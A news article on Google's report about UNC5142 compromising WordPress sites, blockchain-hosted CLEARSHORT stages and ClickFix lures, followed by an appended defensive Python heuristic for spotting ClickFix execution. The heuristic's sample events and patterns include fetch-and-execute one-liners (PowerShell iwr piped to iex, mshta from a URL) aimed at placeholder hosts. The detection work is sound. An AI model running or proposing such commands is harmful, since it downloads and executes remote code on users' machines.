- UNC5142 hacked more than 14,000 WordPress sites to distribute malware
- Malware payloads were obtained from the blockchain, increasing resilience and hampering takedowns.
- ClickFix tricks users into executing malicious commands
More than 14,000 WordPress websites were hacked and used as launch pads for malware distribution, Google’s Threat Intelligence Group (GTIG) said in a recent report.
Discussing the campaign in depth, GTIG said that it is the work of UNC5142, a relatively new threat actor that emerged in late 2023 and stopped operations in late July 2025.
It is not yet known whether the pause is temporary or permanent, or whether the group has simply switched to different techniques. Given its previous success at compromising websites and deploying malware, Google believes the group has merely improved its obfuscation and is still operating in the wild.
Blockchain and ClickFix
In the campaign, UNC5142 would “indiscriminately” target vulnerable WordPress sites (those with vulnerable plugins or theme files and, in some cases, a compromised WordPress database itself).
These sites were injected with a multi-stage JavaScript downloader called CLEARSHORT, which the group used to distribute malware. The downloader fetched its second stage from a public blockchain, most often the BNB chain.
The researchers noted that the use of blockchain is significant because it improves resilience and makes takedowns more difficult:
“The use of blockchain technology for much of UNC5142’s infrastructure and operation increases its resilience in the face of detection and removal efforts,” the report says.
“Network-based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic given the lack of use of traditional URLs. Seizure and deletion operations are also hampered given the immutability of the blockchain.”
Using data pulled from the public blockchain, the malware then retrieved a CLEARSHORT landing page from an external server. This landing page delivered ClickFix’s social engineering lure: it asked users to copy and paste a command into the Run dialog on Windows (or the Terminal app on a Mac), which ultimately downloads the malware.
The landing pages were typically hosted on a Cloudflare .dev page and retrieved in encrypted form.
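A defender-side check for the ClickFix step described above, written as an added example (not code from GTIG, TechRadar or the campaign itself): it runs a heuristic over constructed Sysmon-style process-creation records and flags an interpreter launched directly from explorer.exe, as the Run dialog does, with a remote fetch-and-execute command line. The field names, hostnames and records are all assumed or constructed; it covers the Windows case only.

```python
import json
import re

# Interpreters and download utilities a ClickFix lure typically has the victim launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "bitsadmin.exe"}
# Command-line fragments typical of a fetch-and-execute one-liner (matched case-insensitively).
FETCH_PATTERNS = [
    r"https?://",                                     # remote resource named in the command
    r"\b(iwr|invoke-webrequest|downloadstring|start-bitstransfer)\b",
    r"\b(iex|invoke-expression)\b",                   # run fetched text in memory
    r"-(e|ec|enc|encodedcommand)\b",                  # base64-encoded PowerShell body
    r"-w(indowstyle)?\s+hidden",                      # hide the console from the victim
    r"\bmshta(\.exe)?\s+https?://",                   # HTA pulled straight from a URL
]

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event looks like ClickFix execution; [] when it does not."""
    image, parent = _basename(event.get("Image", "")), _basename(event.get("ParentImage", ""))
    if image not in INTERPRETERS:
        return []
    hits = [p for p in FETCH_PATTERNS if re.search(p, event.get("CommandLine", ""), re.I)]
    reasons = [f"{len(hits)} fetch/execute indicator(s) in command line"] if hits else []
    # The Run dialog starts the interpreter directly under explorer.exe, so that parent plus
    # one fetch indicator is enough; from any other parent require two indicators.
    if parent == "explorer.exe" and hits:
        reasons.append("interpreter spawned by explorer.exe (Run dialog) with remote fetch")
        return reasons
    return reasons if len(hits) >= 2 else []

def scan(lines):
    """Parse one JSON event per line; return [(ProcessId, reasons)] for flagged events only."""
    flagged = []
    for line in lines:
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            flagged.append((event["ProcessId"], reasons))
    return flagged

# Constructed Sysmon-style process-creation records; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    r'{"ProcessId": 101, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}',
    r'{"ProcessId": 102, "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c ipconfig /all"}',
    r'{"ProcessId": 103, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c \"iwr https://lure.invalid/verify | iex\""}',
    r'{"ProcessId": 104, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://lure.invalid/check.hta"}',
]
```

Running `scan(SAMPLE_EVENTS)` flags only the two records where explorer.exe spawned an interpreter with a remote-fetch command; a user simply opening PowerShell, or a service running ipconfig, is not reported.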
Via Hacker News